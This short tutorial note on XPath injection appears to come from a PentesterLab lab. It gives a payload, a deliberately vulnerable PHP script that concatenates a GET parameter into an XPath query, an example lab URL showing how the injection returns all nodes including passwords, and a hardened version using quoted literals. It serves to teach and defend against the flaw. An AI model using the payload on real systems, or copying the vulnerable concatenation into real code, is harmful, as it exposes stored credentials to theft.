XPath injection

PoC:

'] | //*| //*['
This plays the same role as the classic SQL injection string
' or ''='
The pipe symbol (|) is the XPath union ("or") operator, and the double slash followed by an asterisk (//*) selects every node in the document.


Example:

<?php
  // Constructed sample document: two users, each with a name, a greeting and a password.
  $x = "<data><users><user><name>hacker</name><message>Hello hacker</message><password>pentesterlab</password></user><user><name>admin</name><message>Hello admin</message><password>s3cr3tP4ssw0rd</password></user></users></data>";

  $xml = simplexml_load_string($x);
  // Vulnerable: the user-controlled "name" parameter is concatenated straight into the XPath predicate.
  $xpath = "users/user/name[.='" . $_GET['name'] . "']/parent::*/message";
  $res = $xml->xpath($xpath);
  // each() was removed in PHP 8; foreach iterates the result set the same way.
  foreach ($res as $node) {
    echo $node;
  }
?>
Payload:
http://192.168.22.173/xml/example2.php?name='] | //*| //*['
After concatenation the expression becomes:
$xpath = "users/user/name[.=''] | //*| //*['']/parent::*/message";
The name predicate is now empty, and the union with //* makes the expression match every node in the document, including the password elements, rather than only the one user's message.
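A hardened version of the same script, added here as an example (it is not the original page's or PentesterLab's code): the user value is embedded as a proper XPath string literal built with concat(), so a quote in the input can no longer close the predicate. The helper name xpathLiteral is my own.

```php
<?php
// Hardened variant of the page's example (added example; xpathLiteral is a hypothetical helper).
// XPath 1.0 has no escape sequence for quotes, so a string literal that may contain
// both ' and " has to be assembled with concat() instead of being wrapped in quotes.
function xpathLiteral(string $value): string {
    if (strpos($value, "'") === false) {
        return "'" . $value . "'";      // no single quote in the value: single-quoted literal
    }
    if (strpos($value, '"') === false) {
        return '"' . $value . '"';      // no double quote in the value: double-quoted literal
    }
    // Both quote kinds present: split on ' and glue the pieces together with concat()
    $parts = array_map(function ($p) { return "'" . $p . "'"; }, explode("'", $value));
    return 'concat(' . implode(', "\'", ', $parts) . ')';
}

// Same constructed sample document as the original example.
$x = "<data><users><user><name>hacker</name><message>Hello hacker</message><password>pentesterlab</password></user><user><name>admin</name><message>Hello admin</message><password>s3cr3tP4ssw0rd</password></user></users></data>";
$xml = simplexml_load_string($x);

$name = $_GET['name'] ?? '';

// The literal is always well-formed, so the input can only ever be compared as text.
$xpath = "users/user/name[.=" . xpathLiteral($name) . "]/parent::*/message";
foreach ($xml->xpath($xpath) as $node) {
    echo $node;
}
?>
```

With the page's payload the query becomes users/user/name[.="'] | //*| //*['"]/parent::*/message, which compares the whole string against each name and matches nothing.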